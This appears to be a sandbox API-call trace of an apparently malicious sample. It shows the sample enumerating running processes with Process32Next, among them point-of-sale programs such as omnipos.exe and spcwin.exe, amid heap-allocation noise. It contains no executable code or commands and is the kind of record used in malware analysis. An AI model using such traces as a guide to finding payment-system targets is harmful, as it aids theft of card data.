[0110.365] SetLastError (dwErrCode=0x0) [0110.365] GetLastError () returned 0x0 [0110.365] SetLastError (dwErrCode=0x0) [0110.365] GetLastError () returned 0x0 [0110.365] SetLastError (dwErrCode=0x0) [0110.365] GetLastError () returned 0x0 [0110.365] SetLastError (dwErrCode=0x0) [0110.366] GetLastError () returned 0x0 [0110.366] SetLastError (dwErrCode=0x0) [0110.366] GetLastError () returned 0x0 [0110.366] SetLastError (dwErrCode=0x0) [0110.366] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704e8 [0110.366] GetLastError () returned 0x0 [0110.366] SetLastError (dwErrCode=0x0) [0110.366] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704e8 | out: hHeap=0x29a0000) returned 1 [0110.366] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69b8 | out: hHeap=0x29a0000) returned 1 [0110.366] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c20 | out: hHeap=0x29a0000) returned 1 [0110.366] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6908 | out: hHeap=0x29a0000) returned 1 [0110.366] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.366] GetLastError () returned 0x0 [0110.366] SetLastError (dwErrCode=0x0) [0110.366] GetLastError () returned 0x0 [0110.366] SetLastError (dwErrCode=0x0) [0110.367] GetLastError () returned 0x0 [0110.367] SetLastError (dwErrCode=0x0) [0110.367] GetLastError () returned 0x0 [0110.367] SetLastError (dwErrCode=0x0) [0110.367] GetLastError () returned 0x0 [0110.367] SetLastError (dwErrCode=0x0) [0110.367] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0110.367] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gun_single_most.exe")) returned 1 [0110.368] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6998 [0110.368] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ca0 [0110.368] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6938 [0110.368] GetLastError () returned 0x0 [0110.368] SetLastError (dwErrCode=0x0) [0110.368] GetLastError () returned 0x0 [0110.369] SetLastError (dwErrCode=0x0) [0110.369] GetLastError () returned 0x0 [0110.369] SetLastError (dwErrCode=0x0) [0110.369] GetLastError () returned 0x0 [0110.369] SetLastError (dwErrCode=0x0) [0110.369] GetLastError () returned 0x0 [0110.369] SetLastError (dwErrCode=0x0) [0110.369] GetLastError () returned 0x0 [0110.369] SetLastError (dwErrCode=0x0) [0110.369] GetLastError () returned 0x0 [0110.369] SetLastError (dwErrCode=0x0) [0110.369] GetLastError () returned 0x0 [0110.369] SetLastError (dwErrCode=0x0) [0110.369] GetLastError () returned 0x0 [0110.369] SetLastError (dwErrCode=0x0) [0110.369] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970380 [0110.369] GetLastError () returned 0x0 [0110.369] SetLastError (dwErrCode=0x0) [0110.369] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970380 | out: hHeap=0x29a0000) returned 1 [0110.370] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6938 | out: hHeap=0x29a0000) returned 1 [0110.370] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ca0 | out: hHeap=0x29a0000) returned 1 [0110.370] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6998 | out: hHeap=0x29a0000) returned 1 [0110.370] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705b0 [0110.370] GetLastError () returned 0x0 [0110.370] SetLastError (dwErrCode=0x0) [0110.370] GetLastError () returned 0x0 [0110.370] SetLastError (dwErrCode=0x0) [0110.370] GetLastError () returned 0x0 [0110.370] SetLastError (dwErrCode=0x0) [0110.370] GetLastError () returned 0x0 [0110.370] SetLastError (dwErrCode=0x0) [0110.370] GetLastError () returned 0x0 [0110.370] SetLastError (dwErrCode=0x0) [0110.370] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39705b0 | out: hHeap=0x29a0000) returned 1 [0110.370] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="set.exe")) returned 1 [0110.371] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6948 [0110.371] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970b60 [0110.371] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68e8 [0110.372] GetLastError () returned 0x0 [0110.372] SetLastError (dwErrCode=0x0) [0110.372] GetLastError () returned 0x0 [0110.372] SetLastError (dwErrCode=0x0) [0110.372] GetLastError () returned 0x0 [0110.372] SetLastError (dwErrCode=0x0) [0110.372] GetLastError () returned 0x0 [0110.372] SetLastError (dwErrCode=0x0) [0110.372] GetLastError () returned 0x0 [0110.372] SetLastError (dwErrCode=0x0) [0110.372] GetLastError () returned 0x0 [0110.372] SetLastError (dwErrCode=0x0) [0110.372] GetLastError () returned 0x0 [0110.372] SetLastError (dwErrCode=0x0) [0110.372] GetLastError () returned 0x0 [0110.372] SetLastError (dwErrCode=0x0) [0110.372] GetLastError () returned 0x0 [0110.372] SetLastError (dwErrCode=0x0) [0110.373] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970498 [0110.373] GetLastError () returned 0x0 [0110.373] SetLastError (dwErrCode=0x0) [0110.373] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970498 | out: hHeap=0x29a0000) returned 1 [0110.373] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68e8 | out: hHeap=0x29a0000) returned 1 [0110.373] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970b60 | out: hHeap=0x29a0000) returned 1 [0110.373] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6948 | out: hHeap=0x29a0000) returned 1 [0110.373] GetLastError () returned 0x0 [0110.373] SetLastError (dwErrCode=0x0) [0110.373] GetLastError () returned 0x0 [0110.373] SetLastError (dwErrCode=0x0) [0110.373] GetLastError () returned 0x0 [0110.373] SetLastError (dwErrCode=0x0) [0110.374] GetLastError () returned 0x0 [0110.374] SetLastError (dwErrCode=0x0) [0110.374] GetLastError () returned 0x0 [0110.374] SetLastError (dwErrCode=0x0) [0110.374] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="exactly.exe")) returned 1 [0110.375] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6898 [0110.375] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970f00 [0110.375] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68a8 [0110.375] GetLastError () returned 0x0 [0110.375] SetLastError (dwErrCode=0x0) [0110.375] GetLastError () returned 0x0 [0110.375] SetLastError (dwErrCode=0x0) [0110.375] GetLastError () returned 0x0 [0110.375] SetLastError (dwErrCode=0x0) [0110.375] GetLastError () returned 0x0 [0110.375] SetLastError (dwErrCode=0x0) [0110.375] GetLastError () returned 0x0 [0110.376] SetLastError (dwErrCode=0x0) [0110.376] GetLastError () returned 0x0 [0110.376] SetLastError (dwErrCode=0x0) [0110.376] GetLastError () returned 0x0 [0110.376] SetLastError (dwErrCode=0x0) [0110.376] GetLastError () returned 0x0 [0110.376] SetLastError (dwErrCode=0x0) [0110.376] GetLastError () returned 0x0 [0110.376] SetLastError (dwErrCode=0x0) [0110.376] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704e8 [0110.376] GetLastError () returned 0x0 [0110.376] SetLastError (dwErrCode=0x0) [0110.376] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704e8 | out: hHeap=0x29a0000) returned 1 [0110.376] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68a8 | out: hHeap=0x29a0000) returned 1 [0110.376] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f00 | out: hHeap=0x29a0000) returned 1 [0110.376] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6898 | out: hHeap=0x29a0000) returned 1 [0110.377] GetLastError () returned 0x0 [0110.377] SetLastError (dwErrCode=0x0) [0110.377] GetLastError () returned 0x0 [0110.377] SetLastError (dwErrCode=0x0) [0110.377] GetLastError () returned 0x0 [0110.377] SetLastError (dwErrCode=0x0) [0110.377] GetLastError () returned 0x0 [0110.377] SetLastError (dwErrCode=0x0) [0110.377] GetLastError () returned 0x0 [0110.377] SetLastError (dwErrCode=0x0) [0110.377] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="dreamentireprice.exe")) returned 1 [0110.378] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68c8 [0110.378] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ea0 [0110.378] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6928 [0110.379] GetLastError () returned 0x0 [0110.379] SetLastError (dwErrCode=0x0) [0110.379] GetLastError () returned 0x0 [0110.379] SetLastError (dwErrCode=0x0) [0110.379] GetLastError () returned 0x0 [0110.379] SetLastError (dwErrCode=0x0) [0110.379] GetLastError () returned 0x0 [0110.379] SetLastError (dwErrCode=0x0) [0110.379] GetLastError () returned 0x0 [0110.379] SetLastError (dwErrCode=0x0) [0110.379] GetLastError () returned 0x0 [0110.379] SetLastError (dwErrCode=0x0) [0110.379] GetLastError () returned 0x0 [0110.379] SetLastError (dwErrCode=0x0) [0110.379] GetLastError () returned 0x0 [0110.379] SetLastError (dwErrCode=0x0) [0110.379] GetLastError () returned 0x0 [0110.379] SetLastError (dwErrCode=0x0) [0110.379] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705b0 [0110.380] GetLastError () returned 0x0 [0110.380] SetLastError (dwErrCode=0x0) [0110.380] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39705b0 | out: hHeap=0x29a0000) returned 1 [0110.380] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6928 | out: hHeap=0x29a0000) returned 1 [0110.380] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ea0 | out: hHeap=0x29a0000) returned 1 [0110.380] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68c8 | out: hHeap=0x29a0000) returned 1 [0110.380] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.380] GetLastError () returned 0x0 [0110.380] SetLastError (dwErrCode=0x0) [0110.380] GetLastError () returned 0x0 [0110.380] SetLastError (dwErrCode=0x0) [0110.380] GetLastError () returned 0x0 [0110.380] SetLastError (dwErrCode=0x0) [0110.380] GetLastError () returned 0x0 [0110.380] SetLastError (dwErrCode=0x0) [0110.380] GetLastError () returned 0x0 [0110.380] SetLastError (dwErrCode=0x0) [0110.381] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0110.381] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="their.exe")) returned 1 [0110.382] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6948 [0110.382] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ea0 [0110.382] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68e8 [0110.382] GetLastError () returned 0x0 [0110.382] SetLastError (dwErrCode=0x0) [0110.382] GetLastError () returned 0x0 [0110.382] SetLastError (dwErrCode=0x0) [0110.382] GetLastError () returned 0x0 [0110.382] SetLastError (dwErrCode=0x0) [0110.382] GetLastError () returned 0x0 [0110.382] SetLastError (dwErrCode=0x0) [0110.382] GetLastError () returned 0x0 [0110.382] SetLastError (dwErrCode=0x0) [0110.382] GetLastError () returned 0x0 [0110.382] SetLastError (dwErrCode=0x0) [0110.382] GetLastError () returned 0x0 [0110.383] SetLastError (dwErrCode=0x0) [0110.383] GetLastError () returned 0x0 [0110.383] SetLastError (dwErrCode=0x0) [0110.383] GetLastError () returned 0x0 [0110.383] SetLastError (dwErrCode=0x0) [0110.383] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703f8 [0110.383] GetLastError () returned 0x0 [0110.383] SetLastError (dwErrCode=0x0) [0110.383] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703f8 | out: hHeap=0x29a0000) returned 1 [0110.383] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68e8 | out: hHeap=0x29a0000) returned 1 [0110.383] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ea0 | out: hHeap=0x29a0000) returned 1 [0110.383] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6948 | out: hHeap=0x29a0000) returned 1 [0110.383] GetLastError () returned 0x0 [0110.383] SetLastError (dwErrCode=0x0) [0110.383] GetLastError () returned 0x0 [0110.383] SetLastError (dwErrCode=0x0) [0110.383] GetLastError () returned 0x0 [0110.384] SetLastError (dwErrCode=0x0) [0110.384] GetLastError () returned 0x0 [0110.384] SetLastError (dwErrCode=0x0) [0110.384] GetLastError () returned 0x0 [0110.384] SetLastError (dwErrCode=0x0) [0110.384] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x614, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operationblack.exe")) returned 1 [0110.385] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68c8 [0110.385] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970dc0 [0110.385] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6998 [0110.385] GetLastError () returned 0x0 [0110.385] SetLastError (dwErrCode=0x0) [0110.385] GetLastError () returned 0x0 [0110.385] SetLastError (dwErrCode=0x0) [0110.385] GetLastError () returned 0x0 [0110.385] SetLastError (dwErrCode=0x0) [0110.385] GetLastError () returned 0x0 [0110.385] SetLastError (dwErrCode=0x0) [0110.385] GetLastError () returned 0x0 [0110.385] SetLastError (dwErrCode=0x0) [0110.385] GetLastError () returned 0x0 [0110.385] SetLastError (dwErrCode=0x0) [0110.385] GetLastError () returned 0x0 [0110.385] SetLastError (dwErrCode=0x0) [0110.385] GetLastError () returned 0x0 [0110.385] SetLastError (dwErrCode=0x0) [0110.385] GetLastError () returned 0x0 [0110.386] SetLastError (dwErrCode=0x0) [0110.386] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970470 [0110.386] GetLastError () returned 0x0 [0110.386] SetLastError (dwErrCode=0x0) [0110.386] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970470 | out: hHeap=0x29a0000) returned 1 [0110.386] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6998 | out: hHeap=0x29a0000) returned 1 [0110.386] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970dc0 | out: hHeap=0x29a0000) returned 1 [0110.386] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68c8 | out: hHeap=0x29a0000) returned 1 [0110.386] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.386] GetLastError () returned 0x0 [0110.386] SetLastError (dwErrCode=0x0) [0110.386] GetLastError () returned 0x0 [0110.386] SetLastError (dwErrCode=0x0) [0110.386] GetLastError () returned 0x0 [0110.386] SetLastError (dwErrCode=0x0) [0110.386] GetLastError () returned 0x0 [0110.387] SetLastError (dwErrCode=0x0) [0110.387] GetLastError () returned 0x0 [0110.387] SetLastError (dwErrCode=0x0) [0110.387] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.387] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0110.388] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68f8 [0110.388] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ce0 [0110.388] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6888 [0110.388] GetLastError () returned 0x0 [0110.388] SetLastError (dwErrCode=0x0) [0110.388] GetLastError () returned 0x0 [0110.388] SetLastError (dwErrCode=0x0) [0110.388] GetLastError () returned 0x0 [0110.389] SetLastError (dwErrCode=0x0) [0110.389] GetLastError () returned 0x0 [0110.389] SetLastError (dwErrCode=0x0) [0110.389] GetLastError () returned 0x0 [0110.389] SetLastError (dwErrCode=0x0) [0110.389] GetLastError () returned 0x0 [0110.389] SetLastError (dwErrCode=0x0) [0110.389] GetLastError () returned 0x0 [0110.389] SetLastError (dwErrCode=0x0) [0110.389] GetLastError () returned 0x0 [0110.389] SetLastError (dwErrCode=0x0) [0110.389] GetLastError () returned 0x0 [0110.389] SetLastError (dwErrCode=0x0) [0110.389] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704c0 [0110.389] GetLastError () returned 0x0 [0110.389] SetLastError (dwErrCode=0x0) [0110.389] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704c0 | out: hHeap=0x29a0000) returned 1 [0110.389] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6888 | out: hHeap=0x29a0000) returned 1 [0110.389] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ce0 | out: hHeap=0x29a0000) returned 1 [0110.389] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68f8 | out: hHeap=0x29a0000) returned 1 [0110.389] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970678 [0110.389] GetLastError () returned 0x0 [0110.389] SetLastError (dwErrCode=0x0) [0110.390] GetLastError () returned 0x0 [0110.390] SetLastError (dwErrCode=0x0) [0110.390] GetLastError () returned 0x0 [0110.390] SetLastError (dwErrCode=0x0) [0110.390] GetLastError () returned 0x0 [0110.390] SetLastError (dwErrCode=0x0) [0110.390] GetLastError () returned 0x0 [0110.390] SetLastError (dwErrCode=0x0) [0110.390] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970678 | out: hHeap=0x29a0000) returned 1 [0110.390] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x704, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0110.391] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6808 [0110.391] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970e40 [0110.391] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69d8 [0110.391] GetLastError () returned 0x0 [0110.391] SetLastError (dwErrCode=0x0) [0110.391] GetLastError () returned 0x0 [0110.392] SetLastError (dwErrCode=0x0) [0110.392] GetLastError () returned 0x0 [0110.392] SetLastError (dwErrCode=0x0) [0110.392] GetLastError () returned 0x0 [0110.392] SetLastError (dwErrCode=0x0) [0110.392] GetLastError () returned 0x0 [0110.392] SetLastError (dwErrCode=0x0) [0110.392] GetLastError () returned 0x0 [0110.392] SetLastError (dwErrCode=0x0) [0110.392] GetLastError () returned 0x0 [0110.392] SetLastError (dwErrCode=0x0) [0110.392] GetLastError () returned 0x0 [0110.392] SetLastError (dwErrCode=0x0) [0110.392] GetLastError () returned 0x0 [0110.392] SetLastError (dwErrCode=0x0) [0110.392] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970358 [0110.392] GetLastError () returned 0x0 [0110.392] SetLastError (dwErrCode=0x0) [0110.392] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970358 | out: hHeap=0x29a0000) returned 1 [0110.392] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69d8 | out: hHeap=0x29a0000) returned 1 [0110.392] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e40 | out: hHeap=0x29a0000) returned 1 [0110.392] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6808 | out: hHeap=0x29a0000) returned 1 [0110.392] GetLastError () returned 0x0 [0110.393] SetLastError (dwErrCode=0x0) [0110.393] GetLastError () returned 0x0 [0110.393] SetLastError (dwErrCode=0x0) [0110.393] GetLastError () returned 0x0 [0110.393] SetLastError (dwErrCode=0x0) [0110.393] GetLastError () returned 0x0 [0110.393] SetLastError (dwErrCode=0x0) [0110.393] GetLastError () returned 0x0 [0110.393] SetLastError (dwErrCode=0x0) [0110.393] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="determine.exe")) returned 1 [0110.394] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68e8 [0110.394] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970be0 [0110.394] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6838 [0110.394] GetLastError () returned 0x0 [0110.394] SetLastError (dwErrCode=0x0) [0110.394] GetLastError () returned 0x0 [0110.395] SetLastError (dwErrCode=0x0) [0110.395] GetLastError () returned 0x0 [0110.395] SetLastError (dwErrCode=0x0) [0110.395] GetLastError () returned 0x0 [0110.395] SetLastError (dwErrCode=0x0) [0110.395] GetLastError () returned 0x0 [0110.395] SetLastError (dwErrCode=0x0) [0110.395] GetLastError () returned 0x0 [0110.395] SetLastError (dwErrCode=0x0) [0110.395] GetLastError () returned 0x0 [0110.395] SetLastError (dwErrCode=0x0) [0110.395] GetLastError () returned 0x0 [0110.395] SetLastError (dwErrCode=0x0) [0110.395] GetLastError () returned 0x0 [0110.395] SetLastError (dwErrCode=0x0) [0110.395] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705b0 [0110.395] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970be0 | out: hHeap=0x29a0000) returned 1 [0110.395] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="production-learn.exe")) returned 1 [0110.400] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6948 [0110.400] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970cc0 [0110.400] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68e8 [0110.400] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970358 [0110.400] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970cc0 | out: hHeap=0x29a0000) returned 1 [0110.400] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.400] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0110.401] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6958 [0110.401] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970cc0 [0110.401] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6968 [0110.401] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703d0 [0110.401] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970cc0 | out: hHeap=0x29a0000) returned 1 [0110.401] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0110.403] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69a8 [0110.403] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970e40 [0110.403] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6958 [0110.403] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970358 [0110.403] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e40 | out: hHeap=0x29a0000) returned 1 [0110.403] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706c8 [0110.403] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0110.404] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6908 [0110.404] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970c00 [0110.404] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6838 [0110.405] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705b0 [0110.405] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c00 | out: hHeap=0x29a0000) returned 1 [0110.405] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0110.406] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6968 [0110.406] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970f20 